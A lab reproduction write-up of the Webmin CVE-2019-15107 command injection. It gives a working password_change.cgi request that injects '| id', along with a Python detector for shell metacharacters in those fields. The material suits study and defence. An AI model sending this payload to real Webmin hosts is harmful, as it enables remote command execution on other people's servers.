CVE-2019-15107 Webmin Remote Command Execution Vulnerability

Vulnerability introduction

Webmin is currently the most powerful web-based Unix system management tool. Administrators access Webmin's management functions through a browser and carry out the corresponding management actions there. The vulnerability is a command execution flaw in the password_change.cgi file, which is part of the password reset function: because the input is not validated, a malicious third party can execute malicious code.

Affected version

  • Webmin <= 1.920

Environment build

  • cd /root/vulhub/webmin/CVE-2019-15107
  • docker-compose up -d
  • Visit the target website: https://Your-IP:10000

Vulnerability recurrence

1. Construct the following payload

POST /password_change.cgi HTTP/1.1
Host: IP:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://IP:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 62

user=rootxx&pam=&expired=2&old=test| id &new1=test2&new2=test2

2. Use Burp to capture the request and modify it as shown above. The response shows that the id command was executed successfully. (The code path that modifies `/etc/shadow`, where the command injection is triggered, is reached only when the value of the user parameter is not a known Linux user.)
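To spot this request in proxy or WAF captures, the following added example (not part of the original post) parses a raw HTTP request and reports which form fields sent to password_change.cgi contain shell metacharacters after URL decoding. The function name, the metacharacter list and the watched field list are assumptions; the sample requests are constructed, the first from the request shown above.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Characters a shell treats specially (assumed list, tune for your environment).
SHELL_META = re.compile(r"[|;&`$()<>\n]")
# Form fields taken from the request shown on this page.
WATCHED_FIELDS = ("user", "old", "new1", "new2")


def suspicious_fields(raw_request: str) -> list[str]:
    """Return watched fields whose decoded value holds shell metacharacters.

    Returns [] for anything that is not a POST to /password_change.cgi.
    """
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    request_line = head.split("\n", 1)[0].split()
    if len(request_line) < 2 or request_line[0].upper() != "POST":
        return []
    if urlsplit(request_line[1]).path != "/password_change.cgi":
        return []
    # parse_qs URL-decodes values, so %7C is caught the same way as a literal |.
    form = parse_qs(body.strip("\n"), keep_blank_values=True)
    return [name for name in WATCHED_FIELDS
            if any(SHELL_META.search(v) for v in form.get(name, []))]


HEADERS = ("Host: IP:10000\r\n"
           "Content-Type: application/x-www-form-urlencoded\r\n\r\n")

# Constructed sample: body copied from the request on this page.
PAGE_REQUEST = ("POST /password_change.cgi HTTP/1.1\r\n" + HEADERS +
                "user=rootxx&pam=&expired=2&old=test| id &new1=test2&new2=test2")
# Constructed sample: same idea with the pipe URL-encoded.
ENCODED_REQUEST = ("POST /password_change.cgi HTTP/1.1\r\n" + HEADERS +
                   "user=rootxx&pam=&expired=2&old=test%7Cid&new1=a1&new2=a1")
# Constructed sample: an ordinary password change.
BENIGN_REQUEST = ("POST /password_change.cgi HTTP/1.1\r\n" + HEADERS +
                  "user=alice&pam=&expired=2&old=OldPass123"
                  "&new1=NewPass456&new2=NewPass456")

if __name__ == "__main__":
    for label, req in (("page", PAGE_REQUEST), ("encoded", ENCODED_REQUEST),
                       ("benign", BENIGN_REQUEST)):
        print(label, suspicious_fields(req))
```

Legitimate passwords can contain some of these characters, so treat a hit as a triage signal to correlate with the Webmin version and the response body rather than as proof of exploitation.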

Origin blog.csdn.net/smli_ng/article/details/115980423